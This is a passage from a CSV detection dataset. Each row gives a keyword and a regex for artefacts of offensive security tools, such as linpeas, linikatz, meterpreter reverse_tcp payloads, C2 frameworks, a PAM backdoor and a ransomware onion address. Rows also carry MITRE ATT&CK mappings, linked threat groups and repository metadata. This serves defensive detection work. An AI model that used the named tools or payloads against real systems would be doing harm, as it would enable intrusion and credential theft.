- TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","1","#linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","51037" 
"*linikatz.zip*",".{0,1000}linikatz\.zip.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","1","#linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","51038" "*linikatzV2.sh*",".{0,1000}linikatzV2\.sh.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/LinikatzV2","1","1","#linux","N/A","10","2","146","15","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z","51039" "*link_tcp 127.0.0.1 *",".{0,1000}link_tcp\s127\.0\.0\.1\s.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","51040" "*linkedin2username.py -u*",".{0,1000}linkedin2username\.py\s\-u.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","51041" "*link-inject*inject link into process*",".{0,1000}link\-inject.{0,1000}inject\slink\sinto\sprocess.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - 
TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","51042" "*linpeas_builder.py*",".{0,1000}linpeas_builder\.py.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","51043" "*linpeas_darwin_amd64*",".{0,1000}linpeas_darwin_amd64.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","51044" "*linpeas_darwin_amd64*",".{0,1000}linpeas_darwin_amd64.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","#linux","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","51045" "*linpeas_darwin_arm64*",".{0,1000}linpeas_darwin_arm64.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - 
TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","51046" "*linpeas_darwin_arm64*",".{0,1000}linpeas_darwin_arm64.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","#linux","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","51047" "*linpeas_fat.sh*",".{0,1000}linpeas_fat\.sh.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","51048" "*linpeas_linux_386*",".{0,1000}linpeas_linux_386.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","51049" "*linpeas_linux_386*",".{0,1000}linpeas_linux_386.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - 
TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","#linux","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","51050" "*linpeas_linux_amd64*",".{0,1000}linpeas_linux_amd64.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","51051" "*linpeas_linux_amd64*",".{0,1000}linpeas_linux_amd64.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","#linux","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","51052" "*linpeas_linux_arm*",".{0,1000}linpeas_linux_arm.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","51053" "*linpeas_linux_arm64*",".{0,1000}linpeas_linux_arm64.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - 
TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","#linux","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","51054" "*linux/x64/meterpreter/reverse_tcp*",".{0,1000}linux\/x64\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","51065" "*linux/x64/shell_reverse_tcp*",".{0,1000}linux\/x64\/shell_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","51066" "*linux:feeds:v2 (by /u/pico-sh)*",".{0,1000}linux\:feeds\:v2\s\(by\s\/u\/pico\-sh\).{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#useragent","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","51067" "*linux_hostrecon*",".{0,1000}linux_hostrecon.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","#linux","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","51069" 
"*linux_hostrecon.*",".{0,1000}linux_hostrecon\..{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","#linux","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","51070" "*Linux_LPE_eBPF_CVE*",".{0,1000}Linux_LPE_eBPF_CVE.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51071" "*linux_sudo_cve-2017-1000367.c*",".{0,1000}linux_sudo_cve\-2017\-1000367\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","51072" "*linux_trap_command.py*",".{0,1000}linux_trap_command\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","#linux","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","51073" "*linux_x64_agent --report * -l * -s ph4ntom*",".{0,1000}linux_x64_agent\s\-\-report\s.{0,1000}\s\-l\s.{0,1000}\s\-s\sph4ntom.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","#linux","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","51074" 
"*LinuxARMLELF32.py*",".{0,1000}LinuxARMLELF32\.py.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","1","#linux","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","51077" "*linux-exploit-suggester*",".{0,1000}linux\-exploit\-suggester.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","#linux","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","51078" "*linux-exploit-suggester*",".{0,1000}linux\-exploit\-suggester.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","51079" "*linux-exploit-suggester.sh*",".{0,1000}linux\-exploit\-suggester\.sh.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","51080" "*linux-exploit-suggester.sh*",".{0,1000}linux\-exploit\-suggester\.sh.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - 
TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","1","#linux","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","51081" "*linux-pam-backdoor-master*",".{0,1000}linux\-pam\-backdoor\-master.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","1","#linux","N/A","10","4","328","85","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z","51083" "*linuxprivchecker*",".{0,1000}linuxprivchecker.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","#linux","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","51084" "*linuxprivchecker.py*",".{0,1000}linuxprivchecker.{0,1000}","offensive_tool_keyword","linuxprivchecker","search for common privilege escalation vectors such as world writable files. misconfigurations. 
clear-text passwords and applicable exploits","T1210.001 - T1082 - T1088 - T1547.001","TA0002 - TA0004 - TA0006 - TA0007 - TA0008","N/A","N/A","Exploitation tool","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py","1","0","#linux","N/A","7","10","1645","524","2022-01-31T10:32:08Z","2016-04-19T13:31:46Z","51085" "*linux-rds-exploit.c*",".{0,1000}linux\-rds\-exploit\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","51086" "*linux-smart-enumeration.sh*",".{0,1000}linux\-smart\-enumeration\.sh.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","51087" "*linux-smart-enumeration-master*",".{0,1000}linux\-smart\-enumeration\-master.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","51088" "*linWinPwn-*",".{0,1000}linWinPwn\-.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - 
TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","51089" "*linWinPwn.*",".{0,1000}linWinPwn\..{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","51090" "*lion2john.pl*",".{0,1000}lion2john\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","51091" "*lion2john-alt.pl*",".{0,1000}lion2john\-alt\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","51092" "*LiquidSnake.exe*",".{0,1000}LiquidSnake\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","N/A","10","10","332","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z","51093" "*lirncvjfmdhv6samxvvlohfqx7jklfxoxj7xn3fh7qeabs3taemdsdqd.onion*",".{0,1000}lirncvjfmdhv6samxvvlohfqx7jklfxoxj7xn3fh7qeabs3taemdsdqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51094" "*List the named pipes on a remote system*",".{0,1000}List\sthe\snamed\spipes\son\sa\sremote\ssystem.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - 
TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","0","#content","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","51095" "*list/steal token of user *default NT AUTHORITY\\SYSTEM for comamnd execution*",".{0,1000}list\/steal\stoken\sof\suser\s\.{0,1000}default\sNT\sAUTHORITY\\\\SYSTEM\sfor\scomamnd\sexecution.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","#content","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","51096" "*list_backdoors*",".{0,1000}list_backdoors.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","51097" "*List_Privileges /Process:powershell*",".{0,1000}List_Privileges\s\/Process\:powershell.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","51098" "*list_tcppivot*",".{0,1000}list_tcppivot.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - 
T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51099" "*list_tokens -u*",".{0,1000}list_tokens\s\-u.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","N/A","1","0","N/A","Incognito","10","10","N/A","N/A","N/A","N/A","51100" "*ListAccountsWithSPN*",".{0,1000}ListAccountsWithSPN.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","51101" "*List-AllMailboxAndPST.ps1*",".{0,1000}List\-AllMailboxAndPST\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","51102" 
"*ListAllUsers.ps1*",".{0,1000}ListAllUsers\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","51103" "*ListDescriptionContainsPass*",".{0,1000}ListDescriptionContainsPass.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","51104" "*listdlls64.exe*",".{0,1000}listdlls64\.exe.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","1","N/A","N/A","7","1","57","13","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z","51105" "*ListDomainAdmins*",".{0,1000}ListDomainAdmins.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","51106" "*ListDomainGroupsLocalAdmin*",".{0,1000}ListDomainGroupsLocalAdmin.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - 
